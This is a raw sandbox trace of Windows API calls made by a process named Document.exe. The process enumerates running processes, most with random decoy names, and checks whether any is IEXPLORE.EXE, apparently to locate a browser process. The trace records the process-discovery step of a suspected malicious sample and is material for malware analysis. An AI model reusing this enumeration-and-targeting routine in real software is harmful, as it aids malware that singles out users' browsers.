MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=261, lpWideCharStr=0x5e36c4, cchWideChar=521 | out: lpWideCharStr="easily.exe") returned 261 [0195.389] CloseHandle (hObject=0xfc) returned 1 [0195.390] GetLastError () returned 0x0 [0195.390] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x698) returned 0xfc [0195.390] GetLastError () returned 0x0 [0195.390] EnumProcessModules (in: hProcess=0xfc, lphModule=0x68f780, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68f780, lpcbNeeded=0x18f8e8) returned 1 [0195.391] GetLastError () returned 0x0 [0195.391] SysStringLen (param_1="") returned 0x104 [0195.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=260, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 260 [0195.391] SysStringLen (param_1="") returned 0x104 [0195.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=261, lpMultiByteStr=0x5e321c, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 261 [0195.391] GetModuleBaseNameA (in: hProcess=0xfc, hModule=0xb70000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="stockportsconvenient.exe") returned 0x18 [0195.392] GetLastError () returned 0x0 [0195.392] SysStringByteLen (bstr="瑳捯火牯獴潣癮湥敩瑮攮數") returned 0x104 [0195.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0195.392] SysStringByteLen (bstr="瑳捯火牯獴潣癮湥敩瑮攮數") returned 0x104 [0195.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=261, lpWideCharStr=0x5e36c4, cchWideChar=521 | out: lpWideCharStr="stockportsconvenient.exe") returned 261 [0195.392] CloseHandle (hObject=0xfc) returned 1 [0195.392] GetLastError () returned 0x0 [0195.392] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x79c) returned 0xfc [0195.392] GetLastError () returned 0x0 [0195.392] EnumProcessModules (in: hProcess=0xfc, lphModule=0x68f780, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68f780, lpcbNeeded=0x18f8e8) returned 1 [0195.394] GetLastError () returned 0x0 [0195.394] SysStringLen (param_1="") returned 0x104 [0195.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=260, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 260 [0195.394] SysStringLen (param_1="") returned 0x104 [0195.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=261, lpMultiByteStr=0x5e321c, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 261 [0195.394] GetModuleBaseNameA (in: hProcess=0xfc, hModule=0x920000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="dangerous.exe") returned 0xd [0195.394] GetLastError () returned 0x0 [0195.394] SysStringByteLen (bstr="慤杮牥畯⹳硥e") returned 0x104 [0195.394] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0195.395] SysStringByteLen (bstr="慤杮牥畯⹳硥e") returned 0x104 [0195.395] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=261, lpWideCharStr=0x5e36c4, cchWideChar=521 | out: lpWideCharStr="dangerous.exe") returned 261 [0195.395] CloseHandle (hObject=0xfc) returned 1 [0195.395] GetLastError () returned 0x0 [0195.395] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7c8) returned 0xfc [0195.395] GetLastError () returned 0x0 [0195.395] EnumProcessModules (in: hProcess=0xfc, lphModule=0x68f780, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68f780, lpcbNeeded=0x18f8e8) returned 1 [0195.396] GetLastError () returned 0x0 [0195.396] SysStringLen (param_1="") returned 0x104 [0195.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=260, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 260 [0195.396] SysStringLen (param_1="") returned 0x104 [0195.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=261, lpMultiByteStr=0x5e321c, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 261 [0195.397] GetModuleBaseNameA (in: hProcess=0xfc, hModule=0x2b0000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="retained_one_psychology.exe") returned 0x1b [0195.397] GetLastError () returned 0x0 [0195.397] SysStringByteLen (bstr="敲慴湩摥潟敮灟祳档汯杯⹹硥e") returned 0x104 [0195.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0195.397] SysStringByteLen (bstr="敲慴湩摥潟敮灟祳档汯杯⹹硥e") returned 0x104 [0195.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=261, lpWideCharStr=0x5e36c4, cchWideChar=521 | out: lpWideCharStr="retained_one_psychology.exe") returned 261 [0195.397] CloseHandle (hObject=0xfc) returned 1 [0195.397] GetLastError () returned 0x0 [0195.397] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x760) returned 0xfc [0195.397] GetLastError () returned 0x0 [0195.398] EnumProcessModules (in: hProcess=0xfc, lphModule=0x68f780, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68f780, lpcbNeeded=0x18f8e8) returned 1 [0195.399] GetLastError () returned 0x0 [0195.399] SysStringLen (param_1="") returned 0x104 [0195.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=260, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 260 [0195.399] SysStringLen (param_1="") returned 0x104 [0195.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=261, lpMultiByteStr=0x5e321c, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 261 [0195.399] GetModuleBaseNameA (in: hProcess=0xfc, hModule=0x890000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="pentium-southampton.exe") returned 0x17 [0195.400] GetLastError () returned 0x0 [0195.400] SysStringByteLen (bstr="数瑮畩⵭潳瑵慨灭潴⹮硥e") returned 0x104 [0195.400] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0195.400] SysStringByteLen (bstr="数瑮畩⵭潳瑵慨灭潴⹮硥e") returned 0x104 [0195.400] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=261, lpWideCharStr=0x5e36c4, cchWideChar=521 | out: lpWideCharStr="pentium-southampton.exe") returned 261 [0195.400] CloseHandle (hObject=0xfc) returned 1 [0195.400] GetLastError () returned 0x0 [0195.400] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6f4) returned 0xfc [0195.400] GetLastError () returned 0x0 [0195.400] EnumProcessModules (in: hProcess=0xfc, lphModule=0x68f780, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68f780, lpcbNeeded=0x18f8e8) returned 1 [0195.401] GetLastError () returned 0x0 [0195.402] SysStringLen (param_1="") returned 0x104 [0195.402] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=260, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 260 [0195.402] SysStringLen (param_1="") returned 0x104 [0195.402] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=261, lpMultiByteStr=0x5e321c, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 261 [0195.402] GetModuleBaseNameA (in: hProcess=0xfc, hModule=0xed0000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="declare.exe") returned 0xb [0195.402] GetLastError () returned 0x0 [0195.402] SysStringByteLen (bstr="敤汣牡⹥硥e") returned 0x104 [0195.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0195.402] SysStringByteLen (bstr="敤汣牡⹥硥e") returned 0x104 [0195.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=261, lpWideCharStr=0x5e36c4, cchWideChar=521 | out: lpWideCharStr="declare.exe") returned 261 [0195.402] CloseHandle (hObject=0xfc) returned 1 [0195.403] GetLastError () returned 0x0 [0195.403] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x464) returned 0xfc [0195.403] GetLastError () returned 0x0 [0195.403] EnumProcessModules (in: hProcess=0xfc, lphModule=0x68f780, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68f780, lpcbNeeded=0x18f8e8) returned 1 [0195.404] GetLastError () returned 0x0 [0195.404] SysStringLen (param_1="") returned 0x104 [0195.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=260, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 260 [0195.404] SysStringLen (param_1="") returned 0x104 [0195.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=261, lpMultiByteStr=0x5e321c, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 261 [0195.404] GetModuleBaseNameA (in: hProcess=0xfc, hModule=0x140000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="credit-albania.exe") returned 0x12 [0195.405] GetLastError () returned 0x0 [0195.405] SysStringByteLen (bstr="牣摥瑩愭扬湡慩攮數") returned 0x104 [0195.405] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0195.405] SysStringByteLen (bstr="牣摥瑩愭扬湡慩攮數") returned 0x104 [0195.405] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=261, lpWideCharStr=0x5e36c4, cchWideChar=521 | out: lpWideCharStr="credit-albania.exe") returned 261 [0195.405] CloseHandle (hObject=0xfc) returned 1 [0195.405] GetLastError () returned 0x0 [0195.405] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x450) returned 0xfc [0195.405] GetLastError () returned 0x0 [0195.405] EnumProcessModules (in: hProcess=0xfc, lphModule=0x68f780, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68f780, lpcbNeeded=0x18f8e8) returned 1 [0195.406] GetLastError () returned 0x0 [0195.407] SysStringLen (param_1="") returned 0x104 [0195.407] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=260, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 260 [0195.407] SysStringLen (param_1="") returned 0x104 [0195.407] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=261, lpMultiByteStr=0x5e321c, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 261 [0195.407] GetModuleBaseNameA (in: hProcess=0xfc, hModule=0x3f0000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="celebrate.exe") returned 0xd [0195.407] GetLastError () returned 0x0 [0195.407] SysStringByteLen (bstr="散敬牢瑡⹥硥e") returned 0x104 [0195.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0195.407] SysStringByteLen (bstr="散敬牢瑡⹥硥e") returned 0x104 [0195.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=261, lpWideCharStr=0x5e36c4, cchWideChar=521 | out: lpWideCharStr="celebrate.exe") returned 261 [0195.408] CloseHandle (hObject=0xfc) returned 1 [0195.408] GetLastError () returned 0x0 [0195.408] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x90) returned 0xfc [0195.408] GetLastError () returned 0x0 [0195.408] EnumProcessModules (in: hProcess=0xfc, lphModule=0x68f780, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68f780, lpcbNeeded=0x18f8e8) returned 1 [0195.454] GetLastError () returned 0x0 [0195.455] SysStringLen (param_1="") returned 0x104 [0195.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=260, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 260 [0195.455] SysStringLen (param_1="") returned 0x104 [0195.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=261, lpMultiByteStr=0x5e321c, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 261 [0195.455] GetModuleBaseNameA (in: hProcess=0xfc, hModule=0x12d0000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="watson_block.exe") returned 0x10 [0195.455] GetLastError () returned 0x0 [0195.455] SysStringByteLen (bstr="慷獴湯扟潬正攮數") returned 0x104 [0195.455] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0195.455] SysStringByteLen (bstr="慷獴湯扟潬正攮數") returned 0x104 [0195.455] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=261, lpWideCharStr=0x5e36c4, cchWideChar=521 | out: lpWideCharStr="watson_block.exe") returned 261 [0195.455] CloseHandle (hObject=0xfc) returned 1 [0195.455] GetLastError () returned 0x0 [0195.455] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x214) returned 0xfc [0195.456] GetLastError () returned 0x0 [0195.456] EnumProcessModules (in: hProcess=0xfc, lphModule=0x68f780, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68f780, lpcbNeeded=0x18f8e8) returned 1 [0195.457] GetLastError () returned 0x0 [0195.458] SysStringLen (param_1="") returned 0x104 [0195.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=260, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 260 [0195.458] SysStringLen (param_1="") returned 0x104 [0195.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=261, lpMultiByteStr=0x5e321c, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 261 [0195.458] GetModuleBaseNameA (in: hProcess=0xfc, hModule=0x1080000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="beef-http-plants.exe") returned 0x14 [0195.458] GetLastError () returned 0x0 [0195.458] SysStringByteLen (bstr="敢晥栭瑴⵰汰湡獴攮數") returned 0x104 [0195.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0195.458] SysStringByteLen (bstr="敢晥栭瑴⵰汰湡獴攮數") returned 0x104 [0195.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=261, lpWideCharStr=0x5e36c4, cchWideChar=521 | out: lpWideCharStr="beef-http-plants.exe") returned 261 [0195.458] CloseHandle (hObject=0xfc) returned 1 [0195.458] GetLastError () returned 0x0 [0195.458] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7f8) returned 0xfc [0195.458] GetLastError () returned 0x0 [0195.459] EnumProcessModules (in: hProcess=0xfc, lphModule=0x68f780, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68f780, lpcbNeeded=0x18f8e8) returned 1 [0195.460] GetLastError () returned 0x0 [0195.460] GetModuleBaseNameA (in: hProcess=0xfc, hModule=0xe50000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="hunting garmin marriage.exe") returned 0x1b [0195.460] GetLastError () returned 0x0 [0195.460] SysStringByteLen (bstr="畨瑮湩⁧慧浲湩洠牡楲条⹥硥e") returned 0x104 [0195.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0195.461] EnumProcessModules (in: hProcess=0xfc, lphModule=0x68f780, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68f780, lpcbNeeded=0x18f8e8) returned 1 [0195.462] GetLastError () returned 0x0 [0195.462] GetModuleBaseNameA (in: hProcess=0xfc, hModule=0xae0000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="portsmouth_sauce_certificates.exe") returned 0x21 [0195.462] GetLastError () returned 0x0 [0195.463] SysStringByteLen (bstr="潰瑲浳畯桴獟畡散损牥楴楦慣整⹳硥e") returned 0x104 [0195.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0195.463] EnumProcessModules (in: hProcess=0xfc, lphModule=0x68f780, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68f780, lpcbNeeded=0x18f8e8) returned 1 [0195.464] GetLastError () returned 0x0 [0195.464] GetModuleBaseNameA (in: hProcess=0xfc, hModule=0xcd0000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="insights hu.exe") returned 0xf [0195.464] GetLastError () returned 0x0 [0195.464] SysStringByteLen (bstr="湩楳桧獴栠⹵硥e") returned 0x104 [0195.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0195.465] EnumProcessModules (in: hProcess=0xfc, lphModule=0x68f780, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68f780, lpcbNeeded=0x18f8e8) returned 1 [0195.466] GetLastError () returned 0x0 [0195.466] GetModuleBaseNameA (in: hProcess=0xfc, hModule=0xdf0000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="stroke_enough_reporter.exe") returned 0x1a [0195.466] GetLastError () returned 0x0 [0195.466] SysStringByteLen (bstr="瑳潲敫敟潮杵彨敲潰瑲牥攮數") returned 0x104 [0195.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0195.467] EnumProcessModules (in: hProcess=0xfc, lphModule=0x68f780, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68f780, lpcbNeeded=0x18f8e8) returned 1 [0195.468] GetLastError () returned 0x0 [0195.468] GetModuleBaseNameA (in: hProcess=0xfc, hModule=0xa0000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="por tramadol started.exe") returned 0x18 [0195.468] GetLastError () returned 0x0 [0195.468] SysStringByteLen (bstr="潰⁲牴浡摡汯猠慴瑲摥攮數") returned 0x104 [0195.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0195.470] EnumProcessModules (in: hProcess=0xfc, lphModule=0x68f780, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68f780, lpcbNeeded=0x18f8e8) returned 1 [0195.471] GetLastError () returned 0x0 [0195.471] GetModuleBaseNameA (in: hProcess=0xfc, hModule=0xd40000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="add.exe") returned 0x7 [0195.471] GetLastError () returned 0x0 [0195.471] SysStringByteLen (bstr="摡⹤硥e") returned 0x104 [0195.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0195.472] EnumProcessModules (in: hProcess=0xfc, lphModule=0x68f780, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68f780, lpcbNeeded=0x18f8e8) returned 1 [0195.473] GetLastError () returned 0x0 [0195.473] GetModuleBaseNameA (in: hProcess=0xfc, hModule=0xcd0000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="argentinasovietavg.exe") returned 0x16 [0195.473] GetLastError () returned 0x0 [0195.473] SysStringByteLen (bstr="牡敧瑮湩獡癯敩慴杶攮數") returned 0x104 [0195.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0195.474] EnumProcessModules (in: hProcess=0xfc, lphModule=0x68f780, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68f780, lpcbNeeded=0x18f8e8) returned 0 [0195.474] GetLastError () returned 0x12b [0195.474] CloseHandle (hObject=0xfc) returned 1 [0195.474] GetLastError () returned 0x12b [0195.474] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x924) returned 0x0 [0195.474] GetLastError () returned 0x5 [0195.474] CloseHandle (hObject=0x0) returned 0 [0195.474] GetLastError () returned 0x6 [0195.474] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9a4) returned 0x0 [0195.474] GetLastError () returned 0x5 [0195.474] CloseHandle (hObject=0x0) returned 0 [0195.474] GetLastError () returned 0x6 [0195.474] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa54) returned 0x0 [0195.474] GetLastError () returned 0x5 [0195.474] CloseHandle (hObject=0x0) returned 0 [0195.474] GetLastError () returned 0x6 [0195.474] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa78) returned 0x0 [0195.474] GetLastError () returned 0x5 [0195.474] CloseHandle (hObject=0x0) returned 0 [0195.474] GetLastError () returned 0x6 [0195.474] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbfc) returned 0x0 [0195.475] GetLastError () returned 0x5 [0195.475] CloseHandle (hObject=0x0) returned 0 [0195.475] GetLastError () returned 0x6 [0195.475] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x278) returned 0xfc [0195.475] GetLastError () returned 0x6 [0195.475] EnumProcessModules (in: hProcess=0xfc, lphModule=0x68f780, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68f780, lpcbNeeded=0x18f8e8) returned 0 [0195.475] GetLastError () returned 0x12b [0195.475] CloseHandle (hObject=0xfc) returned 1 [0195.475] GetLastError () returned 0x12b [0195.475] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x854) returned 0x0 [0195.475] GetLastError () returned 0x5 [0195.475] CloseHandle (hObject=0x0) returned 0 [0195.475] GetLastError () returned 0x6 [0195.475] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x84c) returned 0x0 [0195.475] GetLastError () returned 0x5 [0195.475] CloseHandle (hObject=0x0) returned 0 [0195.475] GetLastError () returned 0x6 [0195.475] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa38) returned 0xfc [0195.475] GetLastError () returned 0x6 [0195.475] EnumProcessModules (in: hProcess=0xfc, lphModule=0x68f780, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68f780, lpcbNeeded=0x18f8e8) returned 1 [0195.476] GetLastError () returned 0x0 [0195.476] GetModuleBaseNameA (in: hProcess=0xfc, hModule=0x400000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="Document.exe") returned 0xc [0195.477] GetLastError () returned 0x0 [0195.477] SysStringByteLen (bstr="潄畣敭瑮攮數") returned 0x104 [0195.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0195.477] VarBstrCmp (bstrLeft="IEXPLORE.EXE", bstrRight="DOCUMENT.EXE", lcid=0x0, dwFlags=0x30001) returned 0x2 [0195.477] CloseHandle (hObject=0xfc) returned 1 [0195.477] GetLastError () returned 0x0 [0195.477] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa68) returned 0xfc [0195.477] GetLastError () returned 0x0 [0195.477] EnumProcessModules (in: hProcess=0xfc, lphModule=0x68f780, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68f780, lpcbNeeded=0x18f8e8) returned 1 [0195.478] GetLastError () returned 0x0 [0195.479] GetModuleBaseNameA (in: hProcess=0xfc, hModule=0x400000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="Document.exe") returned 0xc [0195.479] GetLastError () returned 0x0 [0195.479] SysStringByteLen (bstr="潄畣敭瑮攮數") returned 0x104 [0195.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0195.479] VarBstrCmp (bstrLeft="IEXPLORE.EXE", bstrRight="DOCUMENT.EXE", lcid=0x0, dwFlags=0x30001) returned 0x2 [0195.479] CloseHandle (hObject=0xfc) returned 1 [0195.479] GetLastError () returned 0x0 [0195.479] SafeArrayDestroyDescriptor (psa=0x5e30a0) returned 0x0 [0195.479] SafeArrayDestroyDescriptor (psa=0x5e30d0) returned 0x0 [0195.480] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f774 | out: ppsaOut=0x18f774) returned 0x0 [0195.480] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.480] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.480] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.480] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.480] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.480] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.480] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.480] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 